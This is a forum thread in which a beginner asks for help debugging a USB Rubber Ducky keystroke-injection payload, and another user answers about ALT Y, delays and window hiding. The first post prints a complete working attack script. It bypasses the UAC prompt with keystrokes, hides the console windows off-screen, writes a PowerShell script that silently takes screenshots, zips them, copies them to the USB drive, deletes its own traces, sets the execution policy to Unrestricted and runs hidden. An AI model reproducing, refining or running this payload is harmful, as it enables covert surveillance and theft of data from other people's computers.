trib Posted October 6, 2015 Share Posted October 6, 2015 Hello every one, I am newbie and not a IT expert. I just know basically about coding. I had my USB for 3 months but i have just successfully flash it using window just 2 days ago since it's quite complicated to me. Currently my USB Ducky using twin duck 2.1 firm ware and it was tested on window 10 OS. It can execute simple "Hello World" Payload. But it can't execute "Take screen captures" payload. I encode using Online Encoder Website ( http://ducktoolkit-411.rhcloud.com/Home.jsp).Reporting method was copying to my USB driver. DUCKY is the name that i filled in next step. (Do i need to format it in lowercase as suggestion ?) Here is the script DELAY 1050 GUI r DELAY 1050 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1050 ALT y DELAY 1050 ENTER ALT SPACE DELAY 1050 STRING m DELAY 1050 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 2); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1050 STRING C:\Windows\config-156e3.ps1 ENTER DELAY 1050 ALT F4 DELAY 1050 GUI r DELAY 1050 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1050 ALT y DELAY 1050 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1050 STRING m DELAY 1050 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1050 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER I increase the delay time as well as execute the script by myself to debug. I found something that i think it may be the issues. - I found that The "ALT y"command on the 7th line c not make any change when i executed it. Neither the one on 172nd line command. Not mention that i was combined to the command "TRING mode con:cols=14 lines=1" and turn into "ymode" then the error was "ymode is not recognized as the internal of external command, operable program or batch file". So i erase it. -After erasing "ALT y" command make error. The USB executed that script with this warning "the screen can not set to the number of lines and columns specified". I think i'm currently stuck here. I don't understand what this command means. Can anyone help me solve this solution? Quote Link to comment Share on other sites More sharing options...
Peyo Posted October 6, 2015 Share Posted October 6, 2015 ALT Y command is used when a modal dialog appears and you want to select a button with a shortcut with the letter Y. In this case, the script is trying to select the "Yes" option. That order only works on Windows with english as primary language (for example, in spanish the combination is "ALT S"). To avoid language dependence, I recommend you to use "LEFTARROW+ENTER", assuming any admin order has the option "No" pre selected, on a scheme where the order is "YES - NO" Before going on, I suggest you to understand the script, trying to reproduce line by line. There is no sense in send a payload that you don't understand (i.e., if you have a disk partition, why you need to create a file when simply you can execute from the ducky drive?) Quote Link to comment Share on other sites More sharing options...
trib Posted October 7, 2015 Author Share Posted October 7, 2015 ALT Y command is used when a modal dialog appears and you want to select a button with a shortcut with the letter Y. In this case, the script is trying to select the "Yes" option. That order only works on Windows with english as primary language (for example, in spanish the combination is "ALT S"). To avoid language dependence, I recommend you to use "LEFTARROW+ENTER", assuming any admin order has the option "No" pre selected, on a scheme where the order is "YES - NO" Before going on, I suggest you to understand the script, trying to reproduce line by line. There is no sense in send a payload that you don't understand (i.e., if you have a disk partition, why you need to create a file when simply you can execute from the ducky drive?) Thank you for your reply I do understand the script since i read the ducky script carefully. I also executed every line in the script by myself, not by the USB. I found that, every step was executed smoothly, it just stuck for the command STRING mode con:cols=14 lines=1 after saving the notepad file (config-156e3.ps1) into C:\ . I understand the ducky script, but i admit that i'm not get so familiar with CMD command. All i know about those CMD command is create a notepad file > save to C:\ > then executed it by CMD. I will try to learn command CMD later. Now i just trying to understand what error here. And i think it's because of wrong ducky script Quote Link to comment Share on other sites More sharing options...
Peyo Posted October 8, 2015 Share Posted October 8, 2015 I've been tested those commands on a Win7: opening a admin command prompt with powershell, resizing (the mod string), selecting "move" and moving down with down arrow key, and works like a charm. Maybe the prior commands are the trouble in the full sequence. Are you sure the sequence is executed correctly? It means, is really saving (Control+S), typing the filename (C:\...) and closing the file (ALT+F4) before opening the command prompt? For example, if the save dialog is not showing at time (1.05 secs in your case), the rest of the commands are pointless. Anyway, if you "move down" the cmd window, is not necessary the resize function ;) Quote Link to comment Share on other sites More sharing options...
trib Posted October 8, 2015 Author Share Posted October 8, 2015 I've been tested those commands on a Win7: opening a admin command prompt with powershell, resizing (the mod string), selecting "move" and moving down with down arrow key, and works like a charm. Maybe the prior commands are the trouble in the full sequence. Are you sure the sequence is executed correctly? It means, is really saving (Control+S), typing the filename (C:\...) and closing the file (ALT+F4) before opening the command prompt? For example, if the save dialog is not showing at time (1.05 secs in your case), the rest of the commands are pointless. Anyway, if you "move down" the cmd window, is not necessary the resize function ;) Yes, it did save a notepad file name config-xxx into C:\Window.Everything seems to be ok until the script executed the command "mode con:cols=14 lines=1". So i guess the problem must be in prior commands as you said. So what should i do now? :( Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.